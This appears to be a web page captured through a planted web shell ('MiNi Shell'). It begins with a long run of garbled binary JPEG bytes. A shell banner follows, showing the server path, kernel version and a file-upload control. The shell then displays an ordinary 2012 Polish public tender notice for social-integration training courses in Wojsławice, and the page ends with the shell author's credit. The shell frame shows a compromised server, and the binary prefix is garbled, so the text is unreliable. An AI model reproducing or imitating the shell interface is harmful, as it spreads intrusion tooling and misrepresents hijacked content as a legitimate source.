JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120814/175097-N-2012.html

<p class="kh_header"><b>Wojsławice: organizacja zajęć dla uczestników projektu Czas na aktywność w gminie Wojsławice</b><br>
<b>Numer ogłoszenia: 175097 - 2012; data zamieszczenia: 14.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Uchańska 114, 22-120 Wojsławice, woj. lubelskie, tel. 82 566 95 80, faks 82 566 91 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wojslawice.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja zajęć dla uczestników projektu Czas na aktywność w gminie Wojsławice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest organizacja i przeprowadzenie kursu prawo jazdy kat B, kursu kucharz z modułem zdobienia stołów, warsztatów grupowych z psychologiem, treningu gospodarczego oraz warsztatów z prawnikiem i lekarzem. 
Zamawiający zastrzega, że jest to jedna grupa uczestników, dlatego też zajęcia prawo jazdy oraz kurs kucharza nie mogą się pokrywać z warsztatami z psychologiem, lekarzem, prawnikiem oraz treningiem gospodarczym.
KURS PRAWO JAZDY KATEGORII B  dla 7 osób
1.   Organizacja i realizacja kursu na prawo jazdy kategorii B - dla 7 osób wraz z badaniami lekarskimi oraz ze zgłoszeniem i wniesieniem opłaty za egzamin państwowy 
w Wojewódzkim Ośrodku Ruchu Drogowego w Chełmie osób, które z pozytywnym wynikiem ukończą szkolenie.
2    Zgłoszenie i przystąpienie do egzaminu państwowego na prawo jazdy, powinno nastąpić po zakończeniu szkolenia.
3.  Uczestnicy projektu powinni  przystąpić do egzaminu państwowego na prawo jazdy najpóźniej do dnia 30 listopada  2012r.
4.   Realizacja kursu w zakresie zajęć teoretycznych  Prawo jazdy  powinna być planowana od poniedziałku do piątku w godzinach od 9.00 do 15.00, a po uzyskaniu zgody uczestników kursu, także w dni wolne od pracy. 
5. Wymagamy, aby po każdych 2 godzinach zegarowych zajęć edukacyjnych przewidziana była przerwa 15-to minutowa, przerwy między zajęciami nie pomniejszają wymaganego wymiaru godzin zajęć edukacyjnych w ciągu dnia.
6. Wykonawca zapewnieni catering na zajęciach: kawa, herbata, woda gazowana, niegazowana, ciastka podczas przerw kawowych oraz  obiad składający się z dwóch dań. Obiad będzie podany w jednorazowych naczyniach z jednorazowymi sztućcami.
7. Zajęcia praktyczne Wykonawca zrealizuje według indywidualnych harmonogramów ustalonych z Zamawiającym dla każdego beneficjenta, uwzględniając możliwości czasowe osób kierowanych na szkolenie.
8. Ilość godzin szkolenia - 60 godzin, w tym 30 godzin lekcyjnych szkolenia teoretycznego i 30 godzin zegarowych szkolenia praktycznego.
9. Miejsce realizacji szkolenia - pomieszczenia jednostki szkoleniowej.
10. Miejsce realizacji szkolenia -  Chełm.
11. Warunki lokalowe, sale szkoleniowe, oraz wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p. Poż. .
12. Wykonawca szkolenie praktyczne dla każdego uczestnika skierowanego przez Zamawiającego zrealizuje na pojeździe samochodowym marki, na którym będzie realizowany egzamin państwowy na prawo jazdy.
13. Szkolenia prawa jazdy Wykonawca zrealizuje na zasadach i w miejscach określonych w rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r., Nr 217, poz.1834 ze zm.) oraz rozporządzeniu Ministra Infrastruktury z dnia 4 listopada 2008r. zmieniającym rozporządzenie w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów  i egzaminatorów ( Dz. U z 2009 r. Nr 78, poz. 653).
14. Wykonawca zapewnia także: materiały szkoleniowe (w tym: podręcznik kierowcy, płytę CD z komputerową bazą danych pytań, testy z pytaniami egzaminacyjnymi, materiały biurowe i piśmiennicze); ubezpieczenie na okres kursu oraz w drodze na szkolenie, 
a także na powrót do miejsca zamieszkania; badania lekarskie, samochody do nauki jazdy sprawne technicznie i spełniające wymogi prawem przewidziane w tym w zakresie BHP
 i p.poż.; egzamin wewnętrzny i wydanie zaświadczenia o ukończeniu szkolenia, zgłoszenie i opłatę za egzamin państwowy w Wojewódzkim Ośrodku Ruchu Drogowego w Chełmie.
15. Zaświadczenia, materiały szkoleniowe, - powinny być oznakowane zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013.
16. Wykonawca będzie prowadził dokumentację szkolenia tj. imienne listy obecności 
z każdego dnia szkolenia, imienne listy odbioru materiałów szkoleniowych, protokoły 
z egzaminów.  Potwierdzone za zgodność z oryginałem, kserokopie dokumentów kursu, Wykonawca przekaże Zamawiającemu.

KUCHARZ Z MODUŁEM ZDOBIENIA STOŁÓW 
1. Organizacja i realizacja kursu kucharz z modułem zdobienia stołów dla  8 osób.
2. Miejsce przeprowadzenia szkolenia : Wojsławice.
3. Szkolenie powinno obejmować następujące zagadnienia (zasady BHP; podstawy technologii gastronomicznej; zagadnienia ekonomiczno-prawne; catering i organizacja imprez okolicznościowych; obliczanie wartości energetycznej i odżywczej produktów spożywczych i potraw; dokonywanie oceny produktów i napojów pod względem towaroznawczym;przygotowywanie podstawowego asortymentu potraw i napojów 
z surowców i półproduktów spożywczych w oparciu o normy i receptury gastronomiczne zgodnie z odpowiednimi technikami ich sporządzania; techniki zdobienia stołów, poddawanie obróbce wstępnej i cieplnej surowców odpowiednimi narzędziami, maszynami i urządzeniami;stosowanie zasad zabezpieczenia jakości zdrowotnej potraw, utrzymywanie w czystości i porządku stanowiska pracy, przestrzeganie przepisów sanitarnych, bhp, ppoż. obowiązujących w zakładach żywienia zbiorowego.
4. Liczba godzin: 190  lekcyjnych (w tym zajęcia praktyczne i teoretyczne).
5. Warunki lokalowe, sale szkoleniowe, oraz wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p. Poż.
6. Wykonawca zapewnia także: materiały szkoleniowe, ubezpieczenie na okres kursu oraz w drodze na szkolenie, a także na powrót do miejsca zamieszkania oraz wszelkie potrzebne produkty spożywcze.
7. Zaświadczenia, materiały szkoleniowe, - powinny być oznakowane zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013.
8. Wykonawca będzie prowadził dokumentację szkolenia tj. imienne listy obecności 
z każdego dnia szkolenia, imienne listy odbioru materiałów szkoleniowych, protokoły 
z egzaminów.  Potwierdzone za zgodność z oryginałem, kserokopie dokumentów kursu, Wykonawca przekaże Zamawiającemu.
9. Realizacja kursu powinna być planowana od poniedziałku do piątku w godzinach od 9.00 do 15.00, a po uzyskaniu zgody uczestników kursu, także w dni wolne od pracy. 
10. Wymagamy, aby po każdych 2 godzinach zegarowych zajęć edukacyjnych przewidziana była przerwa 15-to minutowa, przerwy między zajęciami nie pomniejszają wymaganego wymiaru godzin zajęć edukacyjnych w ciągu dnia.
11. Wykonawca zapewnieni catering na zajęciach: kawa, herbata, woda gazowana, niegazowana, ciastka podczas przerw kawowych oraz  obiad składający się z dwóch dań. Obiad będzie podany w jednorazowych naczyniach z jednorazowymi sztućcami.
WARSZTATY GRUPOWE Z PSYCHOLOGIEM
1. Organizacja i przeprowadzenie warsztatów grupowych z psychologiem dla 15 osób.
2. Miejsce przeprowadzenia zajęć Wojsławice.
3. Minimalny zakres tematyczny: motywacja do zmian w życiu, praca z aktualnymi problemami.
4. Warsztaty powinny trwać 20 godzin. Zamawiający przyjmuje, że jedna godzina zajęć to 45 minut.
5. Zaświadczenia, materiały szkoleniowe, - powinny być oznakowane zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013.
6. Wykonawca będzie prowadził dokumentację szkolenia tj. imienne listy obecności 
z każdego dnia szkolenia, imienne listy odbioru materiałów szkoleniowych, protokoły 
z egzaminów.  Potwierdzone za zgodność z oryginałem, kserokopie dokumentów kursu, Wykonawca przekaże Zamawiającemu.
7.  Realizacja kursu powinna być planowana od poniedziałku do piątku w godzinach od 9.00 do 15.00, a po uzyskaniu zgody uczestników kursu, także w dni wolne od pracy. 
8. Wymagamy, aby po każdych 2 godzinach zegarowych zajęć edukacyjnych przewidziana była przerwa 15-to minutowa, przerwy między zajęciami nie pomniejszają wymaganego wymiaru godzin zajęć edukacyjnych w ciągu dnia.
9. Wykonawca zapewnieni catering na zajęciach: kawa, herbata, woda gazowana, niegazowana, ciastka podczas przerw kawowych oraz  obiad składający się z dwóch dań. Obiad będzie podany w jednorazowych naczyniach z jednorazowymi sztućcami
WARSZTATY Z LEKARZEM I PRAWNIKIEM
1. Organizacja i przeprowadzenie zajęć z lekarzem i prawnikiem dla 15 osób.
2. Warsztaty z lekarzem oraz prawnikiem powinny trwać po 10 godzin każdy. Zamawiający przyjmuje, że jedna godzina zajęć to 45 minut.
3.  Miejsce przeprowadzenia zajęć Wojsławice.
4. Zaświadczenia, materiały szkoleniowe, - powinny być oznakowane zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013.
5. Wykonawca będzie prowadził dokumentację szkolenia tj. imienne listy obecności 
z każdego dnia szkolenia, imienne listy odbioru materiałów szkoleniowych, protokoły 
z egzaminów.  Potwierdzone za zgodność z oryginałem, kserokopie dokumentów kursu, Wykonawca przekaże Zamawiającemu.
6. Realizacja kursu powinna być planowana od poniedziałku do piątku w godzinach od 9.00 do 15.00, a po uzyskaniu zgody uczestników kursu, także w dni wolne od pracy. 
7. Wymagamy, aby po każdych 2 godzinach zegarowych zajęć edukacyjnych przewidziana była przerwa 15-to minutowa, przerwy między zajęciami nie pomniejszają wymaganego wymiaru godzin zajęć edukacyjnych w ciągu dnia.
8. Wykonawca zapewnieni catering na zajęciach: kawa, herbata, woda gazowana, niegazowana, ciastka podczas przerw kawowych oraz  obiad składający się z dwóch dań. Obiad będzie podany w jednorazowych naczyniach z jednorazowymi sztućcami
TRENING GOSPODARCZY
1. Organizacja i przeprowadzenie treningu gospodarczego dla 15 osób.
2. Minimalny zakres tematyczny treningu gospodarczego: trening myślenia twórczego, zasoby jakimi dysponuje i plan ich działania - kalkulacja, ustalenie priorytetów wydatków, planowanie wydatków z wyprzedzeniem, realizacja budżetu domowego, weryfikacja budżetu domowego - wprowadzanie zmian.
3.  Miejsce przeprowadzenia zajęć Wojsławice.
4. Warsztaty powinny trwać 20 godzin. Zamawiający przyjmuje, że jedna godzina zajęć to 45 minut.
5. Zaświadczenia, materiały szkoleniowe, - powinny być oznakowane zgodnie 
z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013.
6. Wykonawca będzie prowadził dokumentację szkolenia tj. imienne listy obecności 
z każdego dnia szkolenia, imienne listy odbioru materiałów szkoleniowych, protokoły 
z egzaminów.  Potwierdzone za zgodność z oryginałem, kserokopie dokumentów kursu, Wykonawca przekaże Zamawiającemu.
7.  Realizacja kursu powinna być planowana od poniedziałku do piątku w godzinach od 9.00 do 15.00, a po uzyskaniu zgody uczestników kursu, także w dni wolne od pracy. 
8. Wymagamy, aby po każdych 2 godzinach zegarowych zajęć edukacyjnych przewidziana była przerwa 15-to minutowa, przerwy między zajęciami nie pomniejszają wymaganego wymiaru godzin zajęć edukacyjnych w ciągu dnia.
9. Wykonawca zapewnieni catering na zajęciach: kawa, herbata, woda gazowana, niegazowana, ciastka podczas przerw kawowych oraz  obiad składający się z dwóch dań. Obiad będzie podany w jednorazowych naczyniach z jednorazowymi sztućcami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą wykonanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 2 (dwóch ) usług szkoleniowych polegających na przeprowadzeniu szkoleń dla jednostek pomocy społecznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże , iż posiada wykwalifikowaną kadrę, która:
posiada doświadczenie w prowadzeniu  co najmniej 2 treningów  gospodarczych (osoba do prowadzenia treningu gospodarczego)
posiada minimum 2 letnie doświadczenie w prowadzeniu kursów prawo jazdy (instruktor prawo jazdy)
posiada wykształcenie wyższe na kierunku medycyna (osoba do prowadzenia warsztatów z lekarzem)
posiada wykształcenie wyższe na kierunku psychologia (osoba do prowadzenia warsztatów z psychologiem)
posiada wykształcenie wyższe na kierunku prawo (osoba do prowadzenia warsztatów z prawnikiem)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy w stosunku do treści Oferty Wykonawcy, polegające na: 1.zmianie terminu zamówienia, nieprzekraczającej ram końcowych trwania zamówienia 2.zmianie miejsca przeprowadzenia usługi, z zastrzeżeniem, że proponowane miejsce spełnia warunki określone w postępowaniu przetargowym; 3.zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Wdrażającej dotyczących realizacji projektu; 4.zmianie osób upoważnionych do współpracy w sprawach związanych z wykonaniem umowy, o których mowa w § 10 umowy; 5.zmianie osób przy pomocy których Wykonawca realizować będzie zamówienie, z zastrzeżeniem, że proponowane przez Wykonawcę osoby będą spełniały warunki określone w SIWZ; zmiana taka nie wymaga aneksu do umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wojslawice.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GOPS Wojsławice ul. Uchańska 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2012 godzina 10:30, miejsce: GOPS Wojsławice ul. Uchańska 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany jest  w ramach Programu Operacyjnego Kapitał Ludzki  Czas na aktywność w gminie Wojsławice  współfinansowanego ze środków Unii Europejskiej, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com